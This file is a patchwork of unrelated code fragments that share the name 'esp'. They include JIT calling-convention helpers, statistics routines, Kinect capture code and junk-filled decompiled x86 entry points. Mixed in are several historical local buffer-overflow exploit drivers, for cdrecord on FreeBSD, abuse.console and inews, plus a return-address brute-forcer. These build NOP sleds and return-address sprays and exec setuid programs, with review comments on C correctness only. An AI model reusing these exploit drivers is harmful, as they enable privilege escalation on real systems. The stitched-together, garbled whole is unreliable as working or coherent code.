unsigned Processor::call_thiscall_args(Register* obj, const char* args, va_list ap) { std::stack<Argument> arg_stack; std::unordered_set<unsigned char> used_regs; Register esp(*this, ESP, sizeof(void*) * 8); unsigned argCount = 0, floatCount = 0, intCount = 0, regCount = 0, stackBytes = 0; //Set the object as first argument if(obj) { if(!isIntArg64Register(intCount, argCount)) stackBytes += pushSize(); ++argCount; ++intCount; arg_stack.push(obj); } //Read the arguments in... while(args && *args != '\0') { if(*args == 'r') { Register* reg = va_arg(ap,Register*); if(reg->xmm()) { if(!isFloatArg64Register(floatCount, argCount)) stackBytes += pushSize(); ++floatCount; } else { if(!isIntArg64Register(intCount, argCount)) stackBytes += pushSize(); ++intCount; } ++regCount; arg_stack.push(reg); } else if(*args == 'm') {
__entry_point__() { ecx = ecx & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173; eax = eax + ecx; ecx = ecx + edx; (save)0; *__imp__GetModuleHandleA(); asm("Unknown opcode 0x0f"); asm("Unknown opcode 0xc6"); asm("hlt"); edx = esp; for((save)149630669; 1; eax = eax - 149630660) { (restore)eax; } (save)edx; (save)eax; asm("rol dword [esp],0x5"); (restore)edx; asm("bswap edx"); *esp = *esp + edx + -1476385172; *esp(); asm("adc eax,+0x35"); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *L20402008(); }
/* Historical proof-of-concept driver (cdrecord, FreeBSD 3.3): fills one buffer
 * with a repeated address, stages a second buffer in the environment and execs
 * the target. The notes below concern C correctness only. */
int main(int argc, char *argv[]) {
    long addr;
    char buf[LENGTH];
    char egg[EGGIE];
    int i,offset;
    printf("cdrecord exploit by sectorx (FreeBSD)\n");
    if (argc < 2) {
        printf("error: offset must be supplied as a parameter\n");
        printf("*note* FreeBSD 3.3-RELEASE\'s offset is 600\n\n");
        return; /* NOTE(review): `return` with no value in a function declared int; the exit status is undefined. */
    }
    offset = atoi(argv[1]); /* atoi gives no error indication: a non-numeric argument silently becomes 0 */
    addr = esp()+offset;
    printf("Using offset 0x%x [%d], eip = 0x%x\n",offset,offset,addr); /* NOTE(review): addr is a long printed with %x (unsigned int) — mismatched on LP64 */
    /* build the overflow string */
    for (i=0;i<LENGTH;i+=4)
        *(long*)&buf[i] = addr; /* assumes sizeof(long)==4 and LENGTH % 4 == 0 — TODO confirm; with an 8-byte long the last store runs past buf */
    buf[LENGTH-1] = '\0';
    /* build the egg string */
    memset(&egg,0x90,sizeof(egg));
    memcpy(egg+(EGGIE-strlen(devilspawn)-1),devilspawn,strlen(devilspawn)); /* no check that strlen(devilspawn) < EGGIE; the offset underflows otherwise */
    egg[EGGIE-1] = '\0';
    setenv("EGG",egg,1);
    execl("/usr/local/bin/cdrecord","cdrecord-bin","dev=",buf,"/etc/fstab",0); /* NOTE(review): the argument-list terminator must be a null pointer, `(char *)0`; a bare 0 is an int and is not portable through varargs. A failed execl is not reported. */
}
/* Repeatedly forks a child that calls exploit() with a return address swept
 * over a window of +/-3000 bytes around esp() in steps of `offset`.
 * The notes below concern C correctness only. */
void bruteforce(char **path) {
    pid_t pid;
    int x=0, offset=5;
    long ret;
    printf("attemping brute force\n\n");
    if(!getuid()) {
        printf("brute force cannot be run while uid is 0\n");
        exit(0);
    }
    ret=esp()+offset;
    /* NOTE(review): getuid() is evaluated in the parent, whose uid a child cannot
     * change, so this condition never becomes false on its own; the loop only
     * ends when the window is exhausted. */
    while(getuid()&&(x<=3000&&x>=-3000)) {
        if((pid=fork())==0) {
            exploit(ret,path);
            exit(0);
        }
        else perror("fork failed"); /* NOTE(review): runs in the parent on every successful fork (pid > 0), so "fork failed" is printed each iteration; a real failure (pid == -1) is not distinguished and falls through to waitpid(-1, ...) */
        if(waitpid(pid,NULL, 0)!= pid)
            perror("waitpid error");
        if(x>=3000) {
            /* upper half done: restart from esp() and sweep downwards */
            ret=esp();
            x=-1;
        }
        else if(x<=3000&&x>=0) {
            ret+=offset;
            x+=offset;
        }
        else if(x>=-3000&&x<0) {
            ret-=offset;
            x-=offset;
        }
        printf("%d\n\n",x);
    }
    printf("brute force complete..\n\n");
    system("id"); /* shells out to a PATH-resolved command */
}
/* Walk `tab` until an entry with a NULL `believe` pointer and print, for each
 * entry, its description, its expectation esp() and its variance var(). */
void run() {
    int idx = 0;
    while (tab[idx].believe != NULL) {
        double expectation;
        double variance;
        printf("f(x) = %s\n", tab[idx].info);
        expectation = esp(tab[idx].believe, tab[idx].failboat, tab[idx].wincopter);
        printf("E(x) = %.3f\n", expectation);
        variance = var(tab[idx].believe, tab[idx].failboat, tab[idx].wincopter);
        printf("Var(x) = %.3f\n\n", variance);
        ++idx;
    }
}
/// Pop the arguments of a cdecl call, including the padding that was inserted
/// to keep the stack 16-byte aligned at the call site.
/// @param argBytes      bytes of arguments that were pushed for the call
/// @param returnPointer whether a hidden return-value pointer was passed
void Processor::call_cdecl_end(unsigned argBytes, bool returnPointer) {
    Register esp(*this, ESP, sizeof(void*) * 8);
    const unsigned misalign = (stackDepth + argBytes) % 16;
    unsigned toPop = argBytes;
    if(misalign != 0)
        toPop += 16 - misalign;
#ifndef _MSC_VER
    // Presumably the callee already popped the hidden return-pointer slot on
    // non-MSVC targets, so it is excluded here — TODO confirm against the ABI.
    if(returnPointer)
        toPop -= 4;
#endif
    if(toPop != 0)
        esp += toPop;
}
/* Historical snippet: writes a padded buffer followed by "sh -i" to stdout.
 * The notes below concern C correctness only. */
main(int argc, char **argv) { /* NOTE(review): implicit int return type — not valid C99/C++ */
    int i,j,offset;
    unsigned long eip;
    char buffer[4096];
    j=0;
    offset=atoi(argv[1]); /* argv[1] is dereferenced without checking argc */
    eip=esp()+offset;
    for(i=0;i<1008;i++)
        buffer[i]=0x90;
    for(i=(BUFFSIZE - strlen(shell));i<BUFFSIZE;i++)
        buffer[i]=shell[j++]; /* assumes strlen(shell) <= BUFFSIZE <= 4096 — TODO confirm; no bounds check otherwise */
    i=1005;
    buffer[i]=eip & 0xff; /* eip stored byte-wise, least significant byte first, at 1005..1008 */
    buffer[i+1]=(eip >> 8) & 0xff;
    buffer[i+2]=(eip >> 16) & 0xff;
    buffer[i+3]=(eip >> 24) & 0xff;
    printf("%s\nsh -i\n",buffer); /* NOTE(review): buffer is never NUL-terminated here; %s reads past the filled region unless a zero byte happens to be present */
}
/* Historical snippet: builds a command line containing a padded buffer and runs
 * it through system(). The notes below concern C correctness only. */
void main(int argc,char *argv[]) { /* NOTE(review): main must be declared int */
    char cmd[1000];
    int i,x; /* x is unused */
    long retn;
    char buff[LEN];
    printf("\nUsage :- %s <offset>\n..",argv[0]);
    if(argc>1)
        retn=esp()-atoi(argv[1]);
    else
        retn=RET;
    printf("Using return Adress :- ",retn ); /* NOTE(review): no conversion specification for retn, so it is never printed */
    for(i=0;i<LEN;i+=4) {
        *(long*)&buff[i]=retn; /* assumes sizeof(long)==4 and LEN % 4 == 0 — TODO confirm; an 8-byte long overruns buff on the last store */
    }
    for(i=0;i<(LEN-(strlen(shellcode)+8));i++) { /* int/size_t comparison; underflows if strlen(shellcode)+8 > LEN */
        *(buff+i)=NOP;
    }
    memcpy(buff+i,shellcode,strlen(shellcode));
    sprintf(cmd,"/usr/lib/games/abuse/abuse.console -net %s",buff); /* NOTE(review): buff carries no terminating NUL and sprintf is unbounded, so this can overrun the 1000-byte cmd; a terminated source and snprintf would be needed */
    puts("executing .......");
    system(cmd); /* cmd is interpreted by the shell */
    return;
}
/* Historical snippet: writes a crafted article to TMPFILE and hands it to inews.
 * The notes below concern C correctness only. */
int main(int argc,char **argv){
    char bof[600]; // give or take a few. (528)
    int i,offset,gid=NEWSGID;
    long ret;
    FILE *inewsfile;
    if(argc>1){offset=atoi(argv[1]);}
    else{offset=DEFAULT_OFFSET;}
    ret=(esp()-offset);
    for(i=ALIGN;i<600;i+=4){*(long *)&bof[i]=ret;} // assumes sizeof(long)==4 and that ALIGN keeps every store inside bof — TODO confirm
    exec[10]=gid; // stores gid into one element of exec; if exec is a char array only the low byte survives
    for(i=0;i<(600-strlen(exec)-100);i++){*(bof+i)=0x90;}
    memcpy(bof+i,exec,strlen(exec));
    // NOTE(review): bof has no explicit terminator; strlen(bof) and "%s" below rely on a zero byte inside the stored addresses.
    unlink(TMPFILE); // clean house. NOTE(review): unlink-then-fopen on a fixed path is a TOCTOU/symlink race if TMPFILE is in a shared directory; mkstemp() avoids it.
    inewsfile=fopen(TMPFILE,"w"); // NOTE(review): a NULL return is not checked before fprintf
    fprintf(inewsfile,"From: %s\n",bof); // required, woops.
    fprintf(inewsfile,"Newsgroups: %s\n",NEWSGROUP); // required.
    fprintf(inewsfile,"Subject: %s\n\n",SUBJECT); // required.
    fclose(inewsfile);
    printf("[ return address: 0x%lx, offset: %d, actual size: %d(sc=%d). ]\n",ret,offset,strlen(bof),strlen(exec)); // NOTE(review): strlen() yields size_t but %d expects int — %zu
    if(execlp(PATH,"inews","-h",TMPFILE,0)){ // execlp only returns on failure; the terminator should be (char *)0, not a bare 0
        printf("%s: failed, is %s the correct path?\n",argv[0],PATH);
        exit(-1);
    }
}
/* Command-line front end: -t selects a target entry, -b runs bruteforce() on
 * it, -o computes the return address from an explicit offset.
 * The notes below concern C correctness only. */
int main(int argc, char **argv) {
    int cnt, sel; // NOTE(review): sel is uninitialized; `-b` given before `-t`/`-o` reads it as garbage
    char *offset; // NOTE(review): declared as a pointer but assigned an int from atoi() and added to a long below — should be int
    long returnaddr;
    if(argc == 1) {
        usage((char **)argv[0]); // NOTE(review): argv[0] is a char*; casting it to char** is wrong — the default branch passes &argv[0]
        exit(1);
    }
    while((cnt = getopt(argc,argv,"t:b:o:")) != EOF) { // getopt signals the end with -1; EOF merely happens to equal -1 on common libcs
        switch(cnt) {
            case 't': //target distro
                sel = atoi(optarg);
                exploit(target[sel-1].ret,(char **)target[sel-1].path); // no range check on sel: 0 or a large value indexes outside target[]
                break;
            case 'b': //brute force
                bruteforce((char **)target[sel-1].path);
                break;
            case 'o': //offset
                offset = atoi(optarg);
                returnaddr=esp()+offset;
                sel = atoi(optarg); // NOTE(review): sel and offset are both taken from the same optarg — presumably unintended
                exploit(returnaddr,(char **)target[sel-1].path);
                break;
            default:
                usage(&argv[0]);
                break;
        }
    }
    return(0);
}
/* Variance of the density `believe` over [ko, ok]: the integral of
 * (x - m)^2 * believe(x) evaluated by composite Simpson's rule with ITER
 * panels, where m is the value returned by esp() (presumably the mean). */
double var(double (*believe)(), double ko, double ok) {
    double mean;
    double h;
    double node_sum;  /* interior panel boundaries, weight 2 */
    double mid_sum;   /* panel midpoints, weight 4 */
    double k;
    node_sum = 0.f;
    mid_sum = 0.f;
    mean = esp(believe, ko, ok);
    h = (double)((double)(ok - ko) / (double)ITER);
    k = 1.f;
    while (k <= (ITER - 1.f)) {
        double x = ko + k * h;
        double d = x - mean;
        node_sum += (d * d) * believe(x);
        k += 1.f;
    }
    node_sum *= 2.f;
    k = 0.f;
    while (k <= (ITER - 1.f)) {
        double x = ko + k * h + h / 2.f;
        double d = x - mean;
        mid_sum += (d * d) * believe(x);
        k += 1.f;
    }
    mid_sum *= 4.f;
    return (((double)(ok - ko) / (6.f * ITER)) * ((ko - mean) * believe(ko) + (ok - mean) * believe(ok) + node_sum + mid_sum));
}
__entry_point__() { eax = eax + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx; edx = *esp; asm("Unknown opcode 0x0f"); asm("Unknown opcode 0xc6"); asm("hlt"); for(eax = 132853453; 1; eax = eax - 132853450) { } (save)eax; *esp = *esp - 2; (restore)eax; asm("bswap eax"); (save)eax; *esp = *esp + -50321797; *esp = *esp + edx; asm("adc edx,+0x19"); eax = *esp() - 21; *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); 
*__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); ecx = ecx + 1; }
/// Lower the stack pointer so that, once argBytes of arguments are pushed, the
/// stack is 16-byte aligned at the call instruction.
/// @param argBytes bytes of arguments about to be pushed
void Processor::call_cdecl_prep(unsigned argBytes) {
    const unsigned misalign = (stackDepth + argBytes) % 16;
    Register esp(*this, ESP, sizeof(void*) * 8);
    if(misalign == 0)
        return;
    esp -= 16 - misalign;
}
L00411768() { asm("aam 0xf0"); *eax = *eax + 1; cl = 226; *eax = *eax + 1; ss = esp; *eax = *eax + 1; -1 = esi * eax; *(eax - 72) = *(eax - 72) + 226; *eax = *eax + 1; eax = eax & 65450; *edi = al; edi = edi + 1; *eax = *eax + 1; *(edx + 2046820572) = *(edx + 2046820572) + dl; ecx = -1771962368; *eax = *eax + al; if(!(edx = edx - 1)) { } *edx = *edx + dh; (save)eax; ah = ah + dl; asm("jecxz 0x41179a"); *(ecx + -1912537145) = *(ecx + -1912537145) + dh; *edi = eax; edi = edi + 4; *eax = *eax + 1; -1 = *(edi + 1934098687) * ecx; *L0000FF57 = *L0000FF57 + ah; (save)ebp; *eax = *eax + 1; *(ecx - 36) = *(ecx - 36) + cl; *eax = *eax + al; eax :: 822083769; asm("xchg eax,esi"); *eax = *eax + al; (save)eax; ah = (eax & 419430515) + dl; asm("aam 0xff"); *(ecx + -1912537167) = *(ecx + -1912537167) + dh; asm("Unknown opcode 0x8e"); *eax = *eax + 1; 0 = *(ebx - 1) * ebp; eax = eax - 1 - 1; *eax = *eax + 1; eax = eax & 65317; bh = bh + bh; *eax = *eax + al; ah = ah + bl; *eax = *eax + al; *(ecx + -1778384896) = *(ecx + -1778384896) + bh; *eax = *eax + al; *ebx = *ebx + dh; *eax = *eax + al; (save)eax; bl = bl + ah; asm("aam 0xff"); bh = bh + al; *(ebx + -1895759986) = *(ebx + -1895759986) + 255; if(!(0 = edi * edi)) { *eax = *eax + 1; (save)edi; eax = eax & 5570815; *eax = *eax + 1; ah = ah + bl; *L3100B900 = *L3100B900 + bh; *(esi + 1929389312) = *(esi + 1929389312) + dl; *L000000FE = *L000000FE + bl; *eax = *eax + dl; asm("lock aam 0xff"); dl = dl + ah; cl = 255; ah = ah + dl; asm("Unknown opcode 0x8e"); *eax = *eax + 1; asm("Unknown opcode 0xc6"); 0 = edi * edi; eax = 72; *L00000048 = *L00000048 + 1; asm("xchg eax,edx"); ah = ah + bl; *edx = *edx + bh; } if(!( *edx = *edx + -1778359808)) { } al = al ^ *eax; (save)eax; bh = bh + bh; asm("aam 0xff"); bh = bh + bh; cl = 255; bh = bh + bh; asm("Unknown opcode 0x8e"); *eax = *eax + 1; goto ( *(ebx - 1)); bh = bh + bh; eax = eax - 1; *eax = *eax + 1; goto ( *L00ff00ff); *eax = *eax + 1; (fsave)(frestore) + *eax + *eax; ecx = 
-1778337536; *(esi + 1929409280) = *(esi + 1929409280) + dl; *eax = *eax + dl; (save)eax; bh = bh + bh; asm("aam 0xf0"); bh = bh + bh; ss = esp; 0 = esi * eax; *(eax - 72) = *(eax - 72) - 1; bh = bh + bh + bh + bh + bh + bh + bh + bh; *edi = eax & 16711850; edi = edi + 1; ah = ah + bl; *(edx + 2046867712) = *(edx + 2046867712) + dl; *(esi + 1929404928) = *(esi + 1929404928) + dl; *edx = *edx + 226; (save)eax; *edx = *edx + dh; bh = bh + bh; asm("aam 0xe3"); bh = bh + bh; cl = 199; gs = *(bh + bh + -1888747776); bh = bh + bh + bh + bh; if(!(eax = eax - 1)) { } goto ( *L00ff0057); (save)ebp; ah = ah + bl; *ecx = *ecx + cl; *L96003D00 = *L96003D00 + dh; *ebx = *ebx + dh; eax = eax & 419450880; bh = bh + bh; asm("aam 0xd4"); bh = bh + bh; cl = 177; bh = bh + bh; asm("Unknown opcode 0x8e"); es = *eax; goto ( *(ebx + 107)); bh = bh + bh; eax = eax - 1 - 1; bh = bh + bh; eax = eax & 16711717; *eax = *eax + al; (fsave)(frestore) + *eax; *eax = *eax + al; ecx = -1778384896; *eax = *eax + al; *ebx = *ebx + dh; *eax = *eax + al; (save)eax; *eax = *eax + al; bh = bh + bh; asm("jecxz 0x4118ef"); bh = bh + bh; asm("Unknown opcode 0xc7"); cl = 0; goto ( *(ebx + -1879113586)); if(!(-1 = *eax * eax)) { bh = bh + bh; (save)edi; ah = (eax & 5635840) + bl; ecx = ecx - 1; *eax = *eax + al; ecx = -1778384835; *eax = *eax ^ eax; *(ebx + 37) = *(ebx + 37) + dh; *eax = *eax + al; (save)eax; asm("sbb [eax],eax"); bh = bh + bh; asm("lock aam 0x0"); goto ( *edx); cl = 0; eax = *esp(); es = *eax; esi = esi + 1; -1 = *eax * eax; ah = 11141120 + bl; asm("xchg eax,edx"); *eax = *eax + al; ecx = -1778384774; asm("bound eax,[eax]"); *(ebx + 74) = *(ebx + 74) + dh; *eax = *eax + al; }
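/// Fetch the current depth and RGB maps from OpenNI, wrap them into an
/// RgbdKinect message and publish it via SEND. Always returns an empty esp().
/// @param frame unused; the latest available frame is read.
esp KinectOpenNI::get(const base::timestamp frame) {
    if(!_connected) {
        return esp();
    }
    // QMutexLocker locker(&_mutex);
    g_depth.GetMetaData(g_depthMD);
    g_image.GetMetaData(g_imageMD);

    // The frame geometry is fixed here; the copies below use these byte counts.
    const int kWidth = 640;
    const int kHeight = 480;
    const size_t depthBytes = static_cast<size_t>(kWidth) * kHeight * 2; // CV_16UC1
    const size_t rgbBytes = static_cast<size_t>(kWidth) * kHeight * 3;   // CV_8UC3

    cv::Mat rgb;
    cv::Mat depth;
    const XnDepthPixel* pDepth = g_depth.GetDepthMap();//g_depthMD.Data();
    depth.create(kHeight,kWidth,CV_16UC1);
    // This check was an assert(), which disappears under NDEBUG while the
    // fixed-size memcpy stays; a frame with other dimensions would then be
    // over-read. Keep it unconditional and skip the frame instead, still
    // advancing the stream so the next call sees fresh data.
    if(g_depthMD.XRes() != depth.cols || g_depthMD.YRes() != depth.rows) {
        g_context.WaitAndUpdateAll();
        return esp();
    }
    memcpy(depth.data,pDepth,depthBytes);

    const XnUInt8* pImage = g_imageMD.Data();
    rgb.create(kHeight,kWidth,CV_8UC3);
    // Same reasoning for the image: rgbBytes assumes 3 bytes per pixel at
    // kWidth x kHeight, so both the format and the dimensions must match.
    if(g_imageMD.PixelFormat() != XN_PIXEL_FORMAT_RGB24
       || g_imageMD.XRes() != rgb.cols || g_imageMD.YRes() != rgb.rows) {
        g_context.WaitAndUpdateAll();
        return esp();
    }
    memcpy(rgb.data,pImage,rgbBytes);

    XnUInt64 F = 0;
    XnDouble pixel_size = 0;
    // get the focal length in mm (ZPD = zero plane distance)
    // NOTE(review): the status returned by both property getters is ignored;
    // on failure F / pixel_size keep their zero initialisers.
    g_depth.GetIntProperty ("ZPD", F);
    // get the pixel size in mm ("ZPPS" = pixel size at zero plane)
    g_depth.GetRealProperty ("ZPPS", pixel_size);
    //qDebug() << F << pixel_size;
    // NOTE(review): kf is heap-allocated and never deleted here — presumably
    // SEND takes ownership; confirm against the macro's definition.
    RgbdKinect *kf = new RgbdKinect(pixel_size,F,_serial,rgb,depth,cv::Point3d(0,0,0));
    SEND(types::Rgbd,kf)

    //xnWaitNoneUpdateAll
    // g_context.WaitNoneUpdateAll();
    g_context.WaitAndUpdateAll();
    return esp();
}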